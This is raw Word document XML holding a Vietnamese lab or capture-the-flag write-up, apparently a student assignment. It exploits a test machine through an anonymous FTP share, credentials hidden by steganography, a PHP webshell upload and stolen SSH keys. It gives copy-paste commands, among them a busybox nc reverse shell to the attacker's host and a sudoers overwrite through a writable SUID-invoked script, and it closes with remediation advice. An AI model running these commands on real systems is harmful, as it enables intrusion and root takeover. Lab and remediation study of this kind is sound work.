    <w:p w14:paraId="05F490F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ssh -i /tmp/arvind_id_rsa -o StrictHostKeyChecking=no arvind@10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B4967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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EBA1D3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~/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABF857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0041E487">
          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62EF88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2.5. Privilege Escalation (SUID reset + writable script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C0AA7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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟥</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> As arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37815EC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Ghi đè script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D6495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&gt; /usr/bin/reset_site.sh &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8B11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lastRenderedPageBreak/>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EE76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echo "arvind ALL=(ALL:ALL) NOPASSWD:ALL" &gt; /etc/sudoers.d/arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420DDE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chown root:root /etc/sudoers.d/arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED74D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chmod 0440 /etc/sudoers.d/arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8C74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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F2DBB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Chạy SUID binary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E305C5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/home/arvind/reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6122B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hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CCF1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./reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722A48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Lấy root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F18AD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sudo su -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593276D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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005253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/root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070868A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/home/arvind/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E64FB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7AE8AEA9">
          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E4481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2.6. Chuỗi khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6D4D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FTP anon → note.jpg → stegseek → dev:d3v...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F801CFD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 xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4EA6D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/auth-lazycorp-dev/login.php → upload shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4902539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 xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E2C6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RCE www-data → reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4709ABF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 xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59168F53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/home/arvind/.ssh/id_rsa (world-readable) → SSH arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51853B4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F90E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/usr/bin/reset_site.sh (writable) + SUID reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A772D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 xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECA80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Ghi sudoers → sudo su → root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7B25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4B817C43">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80C515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2.7. Lệnh copy-paste nhanh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315B9E7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ip=10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2389B5C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kali=10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E50B4" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413AEDF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Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC72DC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nmap -p 21,22,80 -sCV -Pn -T4 $ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50336B4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http://$ip/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA86487" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A257D0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FTP + steg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AB4F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-o note.jpg ftp://anonymous@$ip/pub/note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463E04E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stegseek note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F1EB5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cat note.jpg.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59EB34" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A127D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Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82705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http://$ip/auth-lazycorp-dev/login.php | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1CC8D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Login browser: dev / &lt;password from steg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52D1E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Upload shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A676E" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6E8D65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lastRenderedPageBreak/>
        <w:t># RCE test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3362DC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curl -s "http://$ip/auth-lazycorp-dev/uploads/shell.php?cmd=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146485D7" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6F3C9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Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1973F1CE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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10101F04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curl ... shell.php?cmd=busybox nc $kali 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55829240" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D318B21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As www-data: cat /home/arvind/.ssh/id_rsa → save on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3175A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ssh -i id_rsa arvind@$ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193B189" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0EA672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As arvind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F141670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echo 'arvind ALL=(ALL:ALL) NOPASSWD:ALL' &gt; /usr/bin/reset_site.sh  (payload đầy đủ hơn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADBB46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/home/arvind/reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F65E8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# sudo su -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95ECEA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4188E9BC">
          <v:rect id="_x0000_i1114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAE8E7E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3. Câu 3 — Khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D6E89" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Tắt anonymous; không để file chứa secret trên share công khai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA653DE" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steganography</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Không nhúng credential trong ảnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC13CF" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Validate extension, content-type, lưu ngoài webroot, disable PHP execution trong uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0D3D3" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH key</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Permission 600, thư mục .ssh 700.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B2782" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SUID + writable script</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Không để script được gọi bởi SUID binary ở trạng thái group/world-writable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777788C1" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Không lộ path nhạy cảm (vẫn có thể fuzz được nhưng giảm surface).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC64ED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pict w14:anchorId="3C7BB181">
          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBA2B0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Kết luận ngắn gọn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D1B31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Câu 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D791E2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21 FTP anon | 22 SSH | 80 HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86F24B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robots.txt → /auth-lazycorp-dev/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A1A8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note.jpg (steg) → creds dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9CEB1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Câu 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B47F8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Login + upload webshell → www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4F5F9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id_rsa arvind → SSH arvind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D151D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reset_site.sh writable + SUID reset → root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FFA8F" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Câu 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC380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Tắt FTP anon + không steg creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF77CF" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Validate upload + harden .ssh + không SUID + writable script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE91C5E" w14:textId="77777777" w:rsidR="005361DC" w:rsidRPr="009274F5" w:rsidRDefault="005361DC" w:rsidP="009274F5"/>
    <w:sectPr w:rsidR="005361DC" w:rsidRPr="00927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50F58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C17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7425B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B29A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180294">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10060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5E"/>
    <w:rsid w:val="00052599"/>
    <w:rsid w:val="00127764"/>
    <w:rsid w:val="0044411B"/>
    <w:rsid w:val="005361DC"/>
    <w:rsid w:val="0055611A"/>
    <w:rsid w:val="006C003C"/>
    <w:rsid w:val="006D559E"/>
    <w:rsid w:val="00750656"/>
    <w:rsid w:val="007D1F2A"/>
    <w:rsid w:val="009274F5"/>
    <w:rsid w:val="00A04A39"/>
    <w:rsid w:val="00AE1282"/>
    <w:rsid w:val="00CB0F3F"/>
    <w:rsid w:val="00D31177"/>
    <w:rsid w:val="00D6757B"/>
    <w:rsid w:val="00E912C2"/>
    <w:rsid w:val="00F1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68173-6762-4F9D-AF0A-107AA1AC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11B"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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1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1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11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1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1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1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4441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44411B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26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1B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"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1B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="26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1B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="2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1B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="2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1B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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1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vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0044411B"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/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441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41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1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41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vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0044411B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0044411B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0044411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4411B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44411B"/>
    <w:rPr>
      <w:rFonts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411B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="26"/>
      <w:lang w:val="vi-V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1B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1B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="0044411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4411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4411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4411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4411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411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088. Nguyễn Thanh Hương</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>088. Nguyễn Thanh Hương</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-30T15:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-30T15:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>